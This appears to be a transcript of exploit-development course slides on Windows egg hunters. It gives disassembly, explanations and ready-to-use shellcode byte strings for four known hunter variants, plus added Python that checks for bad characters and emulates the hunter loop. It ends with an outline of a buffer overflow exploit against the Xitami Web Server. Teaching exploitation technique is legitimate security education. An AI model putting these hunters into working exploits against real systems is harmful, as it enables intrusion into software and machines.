Exploit Research and Development Megaprimer: Win32 Egghunter
DESCRIPTION
Exploit Research and Development Megaprimer: http://opensecurity.in/exploit-research-and-development-megaprimer/
Video playlist: http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf
TRANSCRIPT
Exploit Research
Egg Hunter
Kerala Cyber Force (www.keralacyberforce.in)
Ajin Abraham (@ajinabraham)
Why before What !!
Limited Buffer Space
Shellcode = Broken Shellcode
You can't fit a useful shellcode here.
The buffer size is too small.
Solution = Egg Hunting
SOME TERMS RELATED TO EGG HUNTING
Tag: A unique 4-byte string that acts as a marker used to search for and locate the shellcode.
Egg: An 8-byte string formed by combining two tags; the memory layout is tag + tag + shellcode.
Egg Hunter: A small piece of code that we place in the limited buffer. It searches the entire stack or heap for the tag, locates the shellcode, and finally executes it.
The egg and the egg hunter are also part of the shellcode.
The bad character restrictions apply to the egg hunter instructions too.
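As an added example (not from the slides): the NtAccessCheckAndAuditAlarm hunter bytes shown later in this deck are spliced around a chosen tag, and both the hunter and the egg are checked for bad characters, since a tag or payload byte that the target mangles breaks the hunter as well. The default bad-character set and the sample payload are constructed for illustration.

```python
# Hunter bytes as given on the slide (NtAccessCheckAndAuditAlarm variant). The tag is the
# immediate of 'mov eax,imm32' (opcode 0xB8), so it is spliced in between prefix and suffix.
HUNTER_PREFIX = b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
HUNTER_SUFFIX = b"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"


def build(tag, shellcode):
    """Return (hunter, egg): the 32-byte hunter carrying this tag, and tag+tag+shellcode."""
    if len(tag) != 4:
        raise ValueError("tag must be exactly 4 bytes")
    return HUNTER_PREFIX + tag + HUNTER_SUFFIX, tag + tag + shellcode


def bad_chars(blob, badchars):
    """Map each bad byte value found in blob to the offsets where it occurs."""
    found = {}
    for off, b in enumerate(blob):
        if b in badchars:
            found.setdefault(b, []).append(off)
    return found


def check(tag, shellcode, badchars=b"\x00\x0a\x0d"):
    """Check hunter and egg against the target's bad characters (default set is assumed)."""
    hunter, egg = build(tag, shellcode)
    return {
        "hunter_len": len(hunter),
        "hunter_bad": bad_chars(hunter, badchars),
        "egg_bad": bad_chars(egg, badchars),
    }


if __name__ == "__main__":
    # constructed stand-in payload containing a NUL byte; not real shellcode
    print(check(b"lxxl", b"\x90\x90\x00\xcc"))
```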
What is Egg Hunting?
Egg hunting is an exploitation technique used to overcome the limitation of a small buffer that cannot hold our lengthy shellcode.
We may have access to some larger buffer elsewhere in memory. We prepend a 4-byte tag twice (forming an 8-byte egg) to our shellcode and place it in that large buffer.
We then fill our small buffer with a jump to the egg hunter. The egg hunter searches the stack or the heap for two consecutive tags, locates the shellcode that follows them, and executes it.
Egg Hunter Implementation in Windows
SEH, IsBadReadPtr, NtDisplayString, NtAccessCheckAndAuditAlarm
SEH
00000000 EB21           jmp short 0x23
00000002 59             pop ecx
00000003 B86C78786C     mov eax,0x6C78786C   ; TAG (lxxl)
00000008 51             push ecx
00000009 6AFF           push byte -0x1
0000000B 33DB           xor ebx,ebx
0000000D 648923         mov [fs:ebx],esp
00000010 6A02           push byte +0x2
00000012 59             pop ecx
00000013 8BFB           mov edi,ebx
00000015 F3AF           repe scasd
00000017 7507           jnz 0x20
00000019 FFE7           jmp edi
0000001B 6681CBFF0F     or bx,0xfff
00000020 43             inc ebx
00000021 EBED           jmp short 0x10
00000023 E8DAFFFFFF     call 0x2
00000028 6A0C           push byte +0xc
0000002A 59             pop ecx
0000002B 8B040C         mov eax,[esp+ecx]
0000002E B1B8           mov cl,0xb8
00000030 83040806       add dword [eax+ecx],byte +0x6
00000034 58             pop eax
00000035 83C410         add esp,byte +0x10
00000038 50             push eax
00000039 33C0           xor eax,eax
0000003B C3             ret
Size: 60 bytes
Targets: Windows 95/98/ME/NT/2000/XP/2003
Egg Size: 8 bytes
The egg hunter is broken into 3 parts:
1. Exception handler registration.
2. Egg comparison code.
3. Exception handler.
Credits: skape
Shellcode
egghunter = b"\xeb\x21\x59\xb8"
egghunter += b"lxxl"  # tag
egghunter += (b"\x51\x6a\xff\x33\xdb\x64\x89\x23\x6a\x02\x59\x8b\xfb"
              b"\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f\x43\xeb"
              b"\xed\xe8\xda\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1"
              b"\xb8\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x33\xc0\xc3")
IsBadReadPtr
00000000 33DB           xor ebx,ebx
00000002 6681CBFF0F     or bx,0xfff
00000007 43             inc ebx
00000008 6A08           push byte +0x8
0000000A 53             push ebx
0000000B B80D5BE777     mov eax,0x77e75b0d
00000010 FFD0           call eax
00000012 85C0           test eax,eax
00000014 75EC           jnz 0x2
00000016 B86C78786C     mov eax,0x6C78786C   ; TAG (lxxl)
0000001B 8BFB           mov edi,ebx
0000001D AF             scasd
0000001E 75E7           jnz 0x7
00000020 AF             scasd
00000021 75E4           jnz 0x7
00000023 FFE7           jmp edi
Size: 37 bytes
Targets: Windows 95/98/ME/NT/2000/XP/2003
Egg Size: 8 bytes
Credits: skape
Shellcode
egghunter = (b"\x33\xdb\x66\x81\xcb\xff\x0f\x43\x6a\x08"
             b"\x53\xb8\x0d\x5b\xe7\x77\xff\xd0\x85\xc0\x75\xec\xb8")
egghunter += b"lxxl"  # tag
egghunter += b"\x8b\xfb\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"
NtDisplayString
00000000 6681CAFF0F     or dx,0xfff
00000005 42             inc edx
00000006 52             push edx
00000007 6A43           push byte +0x43
00000009 58             pop eax
0000000A CD2E           int 0x2e
0000000C 3C05           cmp al,0x5
0000000E 5A             pop edx
0000000F 74EF           jz 0x0
00000011 B86C78786C     mov eax,0x6C78786C   ; TAG (lxxl)
00000016 8BFA           mov edi,edx
00000018 AF             scasd
00000019 75EA           jnz 0x5
0000001B AF             scasd
0000001C 75E7           jnz 0x5
0000001E FFE7           jmp edi
Size: 32 bytes
Targets: Windows NT/2000/XP/2003
Egg Size: 8 bytes
Credits: skape
Shellcode
egghunter = b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x43\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
egghunter += b"lxxl"  # tag
egghunter += b"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
NtAccessCheckAndAuditAlarm
00000000 6681CAFF0F     or dx,0xfff
00000005 42             inc edx
00000006 52             push edx
00000007 6A02           push byte +0x2
00000009 58             pop eax
0000000A CD2E           int 0x2e
0000000C 3C05           cmp al,0x5
0000000E 5A             pop edx
0000000F 74EF           jz 0x0
00000011 B86C78786C     mov eax,0x6C78786C   ; TAG (lxxl)
00000016 8BFA           mov edi,edx
00000018 AF             scasd
00000019 75EA           jnz 0x5
0000001B AF             scasd
0000001C 75E7           jnz 0x5
0000001E FFE7           jmp edi
Size: 32 bytes
Targets: Windows NT/2000/XP/2003
Egg Size: 8 bytes
The only difference between the NtDisplayString and NtAccessCheckAndAuditAlarm hunters is the syscall number each uses to check whether an access violation occurred (0x43 vs 0x2).
Shellcode
egghunter = b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
egghunter += b"lxxl"  # tag
egghunter += b"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
NtDisplayString / NtAccessCheckAndAuditAlarm
6681CAFF0F   or dx,0x0fff         ; get last address in page
42           inc edx              ; acts as a counter (increments the value in EDX)
52           push edx             ; pushes edx value to the stack
                                  ; (saves our current address on the stack)
6A43         push byte +0x43      ; push 0x43 for NtDisplayString
                                  ; or 0x2 for NtAccessCheckAndAuditAlarm to stack
58           pop eax              ; pop 0x43 or 0x2 into eax
                                  ; so it can be used as parameter to syscall
CD2E         int 0x2e             ; make a syscall using the previous register
3C05         cmp al,0x5           ; check if access violation occurs
                                  ; (0xc0000005 == ACCESS_VIOLATION)
5A           pop edx              ; restore edx
74EF         je xxxx              ; jmp back to start dx 0x0fffff
B86C78786C   mov eax,0x6C78786C   ; tag (lxxl)
8BFA         mov edi,edx          ; set edi to our pointer
AF           scasd                ; compare for status
75EA         jnz xxxxxx           ; (back to inc edx) check egg found or not
AF           scasd                ; when egg has been found
75E7         jnz xxxxx            ; (jump back to "inc edx")
                                  ; if only the first egg was found
FFE7         jmp edi              ; edi points to begin of the shellcode
Credits: corelanc0d3r
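To make the page-stepping and double-compare logic of the walkthrough above concrete, here is an added Python emulation of that hunter loop (it is not code from the slides or from corelanc0d3r). The probe syscall is modelled as a set of unreadable page numbers, and a lone copy of the tag stands in for the hunter's own 'mov eax' immediate, which also illustrates the earlier slides' point about why the egg is the tag twice: a hunter that matched one tag would stop on itself.

```python
PAGE = 0x1000  # the hunter walks memory a page at a time: or dx,0xfff ; inc edx


def hunt(memory, unreadable_pages, tag=b"lxxl", copies=2, start=0):
    """Emulate the NtDisplayString / NtAccessCheckAndAuditAlarm hunter loop.

    memory           -- bytes: a flat image of the scanned address range (constructed)
    unreadable_pages -- set of page numbers for which the probe syscall would return
                        STATUS_ACCESS_VIOLATION (the 'cmp al,0x5' branch)
    copies           -- how many consecutive tags must match (2 for a real egg)
    Returns (offset just past the egg, number of probes) or (None, probes).
    """
    edx = (start | 0xFFF) + 1            # or dx,0xfff ; inc edx -> first byte of next page
    probes = 0
    while edx + 4 * copies <= len(memory):
        probes += 1                      # one int 0x2e per candidate address
        if edx // PAGE in unreadable_pages:
            edx = (edx | 0xFFF) + 1      # fault -> skip the rest of this page
            continue
        # scasd, repeated 'copies' times; any mismatch -> jnz back to 'inc edx'
        if any(memory[edx + 4 * i:edx + 4 * i + 4] != tag for i in range(copies)):
            edx += 1
            continue
        return edx + 4 * copies, probes  # jmp edi: edi points at the shellcode
    return None, probes


def build_image(tag=b"lxxl"):
    """Constructed sample: 4 pages. Page 1 holds a lone tag (like the hunter's own
    'mov eax,0x6C78786C' immediate), page 2 is unreadable, page 3 holds the egg."""
    mem = bytearray(4 * PAGE)
    mem[PAGE + 0x10:PAGE + 0x14] = tag
    shellcode = b"\x90" * 8 + b"\xcc"    # constructed stand-in payload (NOPs + int3)
    egg = tag * 2 + shellcode
    mem[3 * PAGE + 0x200:3 * PAGE + 0x200 + len(egg)] = egg
    return bytes(mem), {2}, shellcode


def demo():
    mem, bad_pages, shellcode = build_image()
    found, probes = hunt(mem, bad_pages)          # real hunter: two tags required
    assert mem[found:found + len(shellcode)] == shellcode
    wrong, _ = hunt(mem, bad_pages, copies=1)     # one-tag hunter stops on the stray copy
    return found, probes, wrong


if __name__ == "__main__":
    print("egg found at 0x%x after %d probes; one-tag hunter would stop at 0x%x" % demo())
```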
Limitation of these egg hunters
The SEH, IsBadReadPtr, NtDisplayString and NtAccessCheckAndAuditAlarm hunters work only on Windows NT/2000/XP/2003.
So you can't use these egg hunter implementations on later Windows versions such as 7 and 8.
Let's build an exploit
Software: Xitami Web Server 2.5b4
Egg Hunter Implementation: NtAccessCheckAndAuditAlarm (32-byte hunter and 8-byte egg)
Normal EIP overwrite
[Diagram: EIP is overwritten with the address of a JMP ESP; ESP points at the shellcode.]
Need for Egg Hunter
[Diagram: EIP is again overwritten with JMP ESP, but the space at ESP is too small for the shellcode.]
Egg Hunter Implementation
[Diagram: EIP -> JMP to ESP -> JMP to reach the egg hunter -> egg hunter searches for the egg, finds it and executes the shellcode. Egg + Shellcode are placed at some other location with enough buffer.]
Thank You